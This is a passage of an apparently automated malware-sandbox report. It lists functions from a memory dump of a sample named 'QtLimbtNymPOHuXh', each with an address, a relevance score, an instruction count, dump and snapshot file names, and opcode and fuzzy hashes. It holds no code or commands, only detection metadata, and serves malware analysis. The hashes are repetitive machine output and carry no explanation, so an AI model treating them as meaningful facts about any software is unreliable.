                        Function 00007FFD9BAB4205 Relevance: .3, Instructions: 288COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd0bfe517cb9e904dea0e84046841be639f513d33fb26ca8eb01a304c8d33467
                        • Instruction ID: 6379a29e5a9f713478223f513b5f4735fc831ab2a3f8c707df64a4df4c1359a9
                        • Opcode Fuzzy Hash: dd0bfe517cb9e904dea0e84046841be639f513d33fb26ca8eb01a304c8d33467
                        • Instruction Fuzzy Hash: E6B1EA70E08A5D8FDB94EF68C895BA8B7F1FF58300F1045A9E05DE7296DA34A981CF41
                        Function 00007FFD9BABC486 Relevance: .3, Instructions: 282COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f0fcd7d2ee8144f788b6c30cc2b4a11110ce1a0b91d66f140c3ddef0c907be5
                        • Instruction ID: 625366a2b9b10bcb06555ef5a675e0ed2c582ac2dc3692082830c5b0208d6fdd
                        • Opcode Fuzzy Hash: 1f0fcd7d2ee8144f788b6c30cc2b4a11110ce1a0b91d66f140c3ddef0c907be5
                        • Instruction Fuzzy Hash: DE817C31A0EA5A4BE3394B689475DB57BE0EF41310F0602BFD05EC7193EE6D79418B91
                        Function 00007FFD9BAC3725 Relevance: .3, Instructions: 272COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e73b2b0c4534e107d29b67c41ba6c483ed4ce8e1b81fa365fd14f8b4c5c5b614
                        • Instruction ID: 97c3dc6a0df067bda04f0444df5466e7ca228c26cead8828060ede6ee61cfd95
                        • Opcode Fuzzy Hash: e73b2b0c4534e107d29b67c41ba6c483ed4ce8e1b81fa365fd14f8b4c5c5b614
                        • Instruction Fuzzy Hash: 29815CA2F19D4D0FEB58EB2848B66B577D1FFA8350F10427AE01DC71D6DE75A8428382
                        Function 00007FFD9BABD1F5 Relevance: .3, Instructions: 271COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7671eeb063e04456e83134587719c680ae4a9eef2110dc58b6d4c14266d032fa
                        • Instruction ID: 20e5dd53ca17d2fa4a0ead445dc0670ebfa91dbe3314574cd8e874c832eda8c1
                        • Opcode Fuzzy Hash: 7671eeb063e04456e83134587719c680ae4a9eef2110dc58b6d4c14266d032fa
                        • Instruction Fuzzy Hash: E9A1C730709B4A4FE769DB69C0A0666B7E1FF54300F55497DC09FC3AA6DAB8F9428B40
                        Function 00007FFD9BAB099C Relevance: .3, Instructions: 267COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8091e6f8c9331f38e9bd10307da2c87b2f39713a00baf10fc14e7a539bd17234
                        • Instruction ID: e211a72e080d15e648f85c54765f37120560e2c4be7fffc323ef4979e9008b1f
                        • Opcode Fuzzy Hash: 8091e6f8c9331f38e9bd10307da2c87b2f39713a00baf10fc14e7a539bd17234
                        • Instruction Fuzzy Hash: 3FA1D830E1995D8FDBA0EF68C895BA8B7B1FF19300F1045A5D01CE72A6DB34A985CF41
                        Function 00007FFD9BAB0CB1 Relevance: .3, Instructions: 251COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c4821173575ffa887bbf52961dc9ef4b33061c485e8cfb6297a5f76560d9a61a
                        • Instruction ID: 90cc89e5029a7d82180bfece072f89c398c4d9257205a83182d0f2041160b5a6
                        • Opcode Fuzzy Hash: c4821173575ffa887bbf52961dc9ef4b33061c485e8cfb6297a5f76560d9a61a
                        • Instruction Fuzzy Hash: 6EA17170E1592D8FDBA5EF18C8A5AE9B7B1FF58301F5005E5A01DE72A5CA34AE81CF40
                        Function 00007FFD9BAB5F71 Relevance: .2, Instructions: 249COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 446972d83649a8cbf50350d47c9c3444d6fb9d238b474826e72f7f5c0e3a5e90
                        • Instruction ID: 25670d74b400da9ceb698c94b2fe4240f31f89be44d55c6c5af6801272b0616b
                        • Opcode Fuzzy Hash: 446972d83649a8cbf50350d47c9c3444d6fb9d238b474826e72f7f5c0e3a5e90
                        • Instruction Fuzzy Hash: EE81AE30D0A65D8FDB55EFA8D864AEDBBF0FF59310F04017AE059E7292CA389945CB50
                        Function 00007FFD9BAC6B45 Relevance: .2, Instructions: 247COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 034a79243bb3afcb73c46d7f35d37a213ff98b52b152a9b87d93e5498e383b98
                        • Instruction ID: db4f76201c5af8f7d77662efbc51a7130117691b79b0fa6fb39bd26d4a48c0f9
                        • Opcode Fuzzy Hash: 034a79243bb3afcb73c46d7f35d37a213ff98b52b152a9b87d93e5498e383b98
                        • Instruction Fuzzy Hash: B2817D30F1960D8FEB54EBA88464ABDB7E2FF58314F210179D019D72A6DF39A842CB41
                        Function 00007FFD9BABE54A Relevance: .2, Instructions: 212COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6ad0565ab02520c0e617de908ed1ab17cb41a7e750ee674cd672a4a56068eb6
                        • Instruction ID: f800f958b4612934ff2ff18e739fa38fd70901616f71dc546584efb7778cbaa0
                        • Opcode Fuzzy Hash: e6ad0565ab02520c0e617de908ed1ab17cb41a7e750ee674cd672a4a56068eb6
                        • Instruction Fuzzy Hash: 22515720B1D6AD0FF75D9BA8C8616F877D0FB46318F2506BDC49BC7197D96868438780
                        Function 00007FFD9BABA540 Relevance: .2, Instructions: 212COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6327cdf5dd3b8e9f11f22f3219ca96c5d1b1a5c5b6664cb015de4b6ebbb4d01a
                        • Instruction ID: 8b424e4a7ea2d7fcf78fff87fb37acd6f93d7a318db5e75d357a059131c86507
                        • Opcode Fuzzy Hash: 6327cdf5dd3b8e9f11f22f3219ca96c5d1b1a5c5b6664cb015de4b6ebbb4d01a
                        • Instruction Fuzzy Hash: 5D517B31F1EA660FD32D8B6CD4654B877E0EF44310B2905BED09BC7197DE19A9438B81
                        Function 00007FFD9BAC0545 Relevance: .2, Instructions: 206COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1d8e6ca2cba347b53633f907b6bc251a23224b870144e65b7fa7c429c9cd6bd
                        • Instruction ID: 3c306858bd0c93756ef94e66f3f5e4f1a70cb056b46a02ffb255eec05d339fe1
                        • Opcode Fuzzy Hash: e1d8e6ca2cba347b53633f907b6bc251a23224b870144e65b7fa7c429c9cd6bd
                        • Instruction Fuzzy Hash: 28516A72A0EA8E9FD764AF6888655FDBFB0EF54310F0502FAD059C70A2EE786941C740
                        Function 00007FFD9BAC0386 Relevance: .2, Instructions: 201COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 114b8c03a5768bd7a347a2b7207d8ae8a78b52813008a86e40ae6e2ab7a51468
                        • Instruction ID: 8e2e8a3169bd9b320ee196afb2af6d61af53d0c9982d178b7eacc4e1793c098b
                        • Opcode Fuzzy Hash: 114b8c03a5768bd7a347a2b7207d8ae8a78b52813008a86e40ae6e2ab7a51468
                        • Instruction Fuzzy Hash: 2A517B31B1D55E4FDB38AB2C88258F537E0EF45315B1A01BAD49ACB1A3DD2CEA438784
                        Function 00007FFD9BABF6BD Relevance: .2, Instructions: 198COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ce13ce90323064b3429a374b81b92f4a3a99a950558165636fb6872108b93fee
                        • Instruction ID: b514e46bea80c58eb5ae9f6d1d479e004b61a16e83ba9012b6121e9084508df5
                        • Opcode Fuzzy Hash: ce13ce90323064b3429a374b81b92f4a3a99a950558165636fb6872108b93fee
                        • Instruction Fuzzy Hash: D8719F30A0AB1A8FE368CB64C1A45A177E1FF54304F65497DC45AC7AA6CB7AF942CF40
                        Function 00007FFD9BAB5FA0 Relevance: .2, Instructions: 195COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84396de26b82467416a63658cd1b806866e1bbaedd1ca9020cbc1c42fad3961d
                        • Instruction ID: 0ae52ba858259b283ee805feda37e2fc64f46b74eb9462e028f6b457fcb5c649
                        • Opcode Fuzzy Hash: 84396de26b82467416a63658cd1b806866e1bbaedd1ca9020cbc1c42fad3961d
                        • Instruction Fuzzy Hash: DE514931A09A5D9FDF90EFA8D854AEDBBF1FF59310F00026AE019E7295DB349985CB40
                        Function 00007FFD9BAB66A8 Relevance: .2, Instructions: 195COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2175b46098395fe58e51b53bdb3590778bb4663a52a0a1aaaf0e60fc206cbddf
                        • Instruction ID: 6dcc9f1b2ccb3b49371c2567d6a911eb640ce8931b74c84bb1810f7754b7fd65
                        • Opcode Fuzzy Hash: 2175b46098395fe58e51b53bdb3590778bb4663a52a0a1aaaf0e60fc206cbddf
                        • Instruction Fuzzy Hash: 2961FA70E1891C8FDB90EFA8C854AADB7F1FF59311F1105A9E41DE7296DB349981CB40
                        Function 00007FFD9BABFF6A Relevance: .2, Instructions: 192COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16f3f08effeea70bc3058195e72bea4c828f6ddeb482e29b7791c45cf46370a0
                        • Instruction ID: a710b1ea2b6f921331a313e2d985a9e7dc1a73e963e1839983ef9f570d8574a8
                        • Opcode Fuzzy Hash: 16f3f08effeea70bc3058195e72bea4c828f6ddeb482e29b7791c45cf46370a0
                        • Instruction Fuzzy Hash: C161B23060AB0A4FE374DB54C1A49B277E1FF44300B52497DC48AC7AA6DBB9F942CB41
                        Function 00007FFD9BAC3D06 Relevance: .2, Instructions: 185COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5a3234a86811c4d48e8df2627c97dbe745712f72bf053bf0cae65dca3dea633d
                        • Instruction ID: 992f057cb79631dddd9868fde475f6ef02609e248c33b0f145c642132ff467e0
                        • Opcode Fuzzy Hash: 5a3234a86811c4d48e8df2627c97dbe745712f72bf053bf0cae65dca3dea633d
                        • Instruction Fuzzy Hash: 42515C31B0EA4A4FE3356BA8A4661B577E0EF45324F0606BED04EC3193DF79B9058381
                        Function 00007FFD9BAB4CF0 Relevance: .2, Instructions: 183COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00d86de2878b3d8a13f94a8578c879b26c99db593a5aaea65f2c9012c78871ad
                        • Instruction ID: ac6671997c8eb7bedaec6d59debdfa1c4450f319d8024e87ab39a7dce1b86c09
                        • Opcode Fuzzy Hash: 00d86de2878b3d8a13f94a8578c879b26c99db593a5aaea65f2c9012c78871ad
                        • Instruction Fuzzy Hash: BA610631A0965D8FDB14EFA8D8616ED7BB0FF48315F0402BAE4189B2A7CE346944CB91
                        Function 00007FFD9BAB1289 Relevance: .2, Instructions: 164COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b87dff3a6b52e348b0de1b6f0018c0464f333e1e22e48cfd040e9c6e8f20f78
                        • Instruction ID: b7fa6332106e9b849320cb6e37e1da76b54c13944b360cee396b2ad7b62c42cc
                        • Opcode Fuzzy Hash: 1b87dff3a6b52e348b0de1b6f0018c0464f333e1e22e48cfd040e9c6e8f20f78
                        • Instruction Fuzzy Hash: 58515D71E19A5D8FDB94EB98C865AECB7F1FF69300F410179E019E72A2CE64A9418B40
                        Function 00007FFD9BAC619D Relevance: .2, Instructions: 161COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7f357f7ccd78a5882656336c87c9af8f5b0cbeae11a069fc07bfac53763b40b
                        • Instruction ID: 7c0b83897d853c32db59be967535d4b2fbc5eab7e0dca3a412a2e23b0a5ef93e
                        • Opcode Fuzzy Hash: d7f357f7ccd78a5882656336c87c9af8f5b0cbeae11a069fc07bfac53763b40b
                        • Instruction Fuzzy Hash: 5E518F30B1AB4A8FE364EF58C1A45B677E1BF54300B51487DC48EC3AA2CBB8B941CB01
                        Function 00007FFD9BAC0741 Relevance: .2, Instructions: 158COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c700f4970271864bcfec8dadd346b73b24f82f9d8a201d618e4dc39cea8150b
                        • Instruction ID: f3fcfb243183db10e6a3c3c14ccc1f54a3759975529b94dd058213bdb810ed4c
                        • Opcode Fuzzy Hash: 7c700f4970271864bcfec8dadd346b73b24f82f9d8a201d618e4dc39cea8150b
                        • Instruction Fuzzy Hash: C3517C74A08A5C8FDB58EF98D864AEDB7F1FF59314F1002AAE40DD7296CB34A841CB41
                        Function 00007FFD9BABAC69 Relevance: .2, Instructions: 153COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9686b571e1381609f31783dbed4c2ae46647b4407d8865a0dc02fda2b798240e
                        • Instruction ID: 5298952a19a27eb94b18fb856427a902fd498a6c12f3b0e33f6277ae06614481
                        • Opcode Fuzzy Hash: 9686b571e1381609f31783dbed4c2ae46647b4407d8865a0dc02fda2b798240e
                        • Instruction Fuzzy Hash: C741C672F1594E4BEB98DBACC8656EC6BA2EF44214F500279E11DD72EACE243C42CF41
                        Function 00007FFD9BAC2082 Relevance: .2, Instructions: 152COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 57ac47cf02cc632365cdb76c361226d0c2c7b0fd1b1c7bc9afb22d8438db28f0
                        • Instruction ID: 22a6ade9f85d0f8277bbe475b71cfd507ad1649194ef3492a2b46bdaae59fa11
                        • Opcode Fuzzy Hash: 57ac47cf02cc632365cdb76c361226d0c2c7b0fd1b1c7bc9afb22d8438db28f0
                        • Instruction Fuzzy Hash: 6241063470DA4D8FDBA8EF4CC865AB837D1FF98311B0102BAE54DC7666DA64ED468780
                        Function 00007FFD9BAC75FF Relevance: .2, Instructions: 151COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2b155a204ecbf0f491b12c92ed52f206b73ce1ca92dde0e7d4c58963806d9126
                        • Instruction ID: 432d0aa66aeb521b155218a893c69217cd72fe703baa00e1d25312934a0a10a1
                        • Opcode Fuzzy Hash: 2b155a204ecbf0f491b12c92ed52f206b73ce1ca92dde0e7d4c58963806d9126
                        • Instruction Fuzzy Hash: EB518170A1992C8FDF94EF68D895AEDB7B1EF58301F5005A9E00DE3291CA34AA80CB41
                        Function 00007FFD9BAB9876 Relevance: .1, Instructions: 149COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 025e3c816d0d9b0830bf7061c87c83e3076027c431899e2de066456ab2aaa781
                        • Instruction ID: 25866785852639ae308c0a14da8a1f74382742f57a3e7545519dc991df211c49
                        • Opcode Fuzzy Hash: 025e3c816d0d9b0830bf7061c87c83e3076027c431899e2de066456ab2aaa781
                        • Instruction Fuzzy Hash: 4B41BC31E0982D8BDB64EF88E850AF9B3B4FB59350F01117AD02DE7191DF75AA818F44
                        Function 00007FFD9BAB9807 Relevance: .1, Instructions: 148COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5663f36f66ce13273056aa1312baa02d9910424a4c8094b59a672129345d5f67
                        • Instruction ID: e9272f2a8eb04c512df5864781cfc3fd48317a0c42a7bfea04d405e9a1efbe1e
                        • Opcode Fuzzy Hash: 5663f36f66ce13273056aa1312baa02d9910424a4c8094b59a672129345d5f67
                        • Instruction Fuzzy Hash: C141FF31E0986D8BDB64EF98D850AF9B3B4FB45350F01117AD02DE71A1DE75AA818F44
                        Function 00007FFD9BAC1C3F Relevance: .1, Instructions: 146COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06397c53437b37c74e402cf9dcbd80af40ebf74d5bc91212751cf0822305cba1
                        • Instruction ID: 64939212e318d5994b0cdf2adcbfdbc0b64eb8b9432a6a27e1a2855167e1f5e2
                        • Opcode Fuzzy Hash: 06397c53437b37c74e402cf9dcbd80af40ebf74d5bc91212751cf0822305cba1
                        • Instruction Fuzzy Hash: C741D331B0E69E8FDB22EBA898704FC7BB0EF56315B0502F7D089DB1A3D9686905C751
                        Function 00007FFD9BAB0FDA Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 624a77b5bac1e9caf4d7dd6ad40340909696bd82229c23cd50449503c5ac31ac
                        • Instruction ID: a5abf33e8a770bfe37646f197cb2c3a905d6de9fefdd69a5238a55560b90b43a
                        • Opcode Fuzzy Hash: 624a77b5bac1e9caf4d7dd6ad40340909696bd82229c23cd50449503c5ac31ac
                        • Instruction Fuzzy Hash: A3415C70E1965D8FDB54EFA8D454AACBBF0FF59304F00017AD019E72A5CB34A940CB00
                        Function 00007FFD9BAC6EA7 Relevance: .1, Instructions: 127COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4bdbddec3b52ed717344bddea1c8bd364dcd1c1e4b9816693ad652df93264bbc
                        • Instruction ID: 0b00fcaa380c2e6197f199d6fdeaa0c2adbf71de1353b2cf0353d5d0068d3329
                        • Opcode Fuzzy Hash: 4bdbddec3b52ed717344bddea1c8bd364dcd1c1e4b9816693ad652df93264bbc
                        • Instruction Fuzzy Hash: 6D41513260D9098FDF98EF58C4A5DA4B7E1FFA8320B1441BAD04EC7192DE25E845CB82
                        Function 00007FFD9BAB4EF9 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 334897ca8beb0df07ce533c070313c2273afe61dc0152d764f6bd3448c88b223
                        • Instruction ID: b1d6017e7da986404f42e6c0e533479cb358da137891e68f0f1f5b7acc23f918
                        • Opcode Fuzzy Hash: 334897ca8beb0df07ce533c070313c2273afe61dc0152d764f6bd3448c88b223
                        • Instruction Fuzzy Hash: BC413970E1464D8FEB84EFA8C8A5AECBBB1FF18311F0441B9E018E7296DA346841CB41
                        Function 00007FFD9BAC6F51 Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d45abde0595a5bfe0ea8c95c784759cfe2c376416b22fafba662dec0e71ecaf1
                        • Instruction ID: 7eb7f0491cf2601a856c698b93596f7484e684ee563f74c1a24b1dd714da3a2f
                        • Opcode Fuzzy Hash: d45abde0595a5bfe0ea8c95c784759cfe2c376416b22fafba662dec0e71ecaf1
                        • Instruction Fuzzy Hash: 9C31913160C9498FDF9CEF18C4A5E64B7E1FFA9320B0446AED05AC7192DE24EC45CB82
                        Function 00007FFD9BAC6EEB Relevance: .1, Instructions: 115COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 466d4015ba208e8f0faf6ad62623b289fefdd8aeafcf2286cfea372600b40b2f
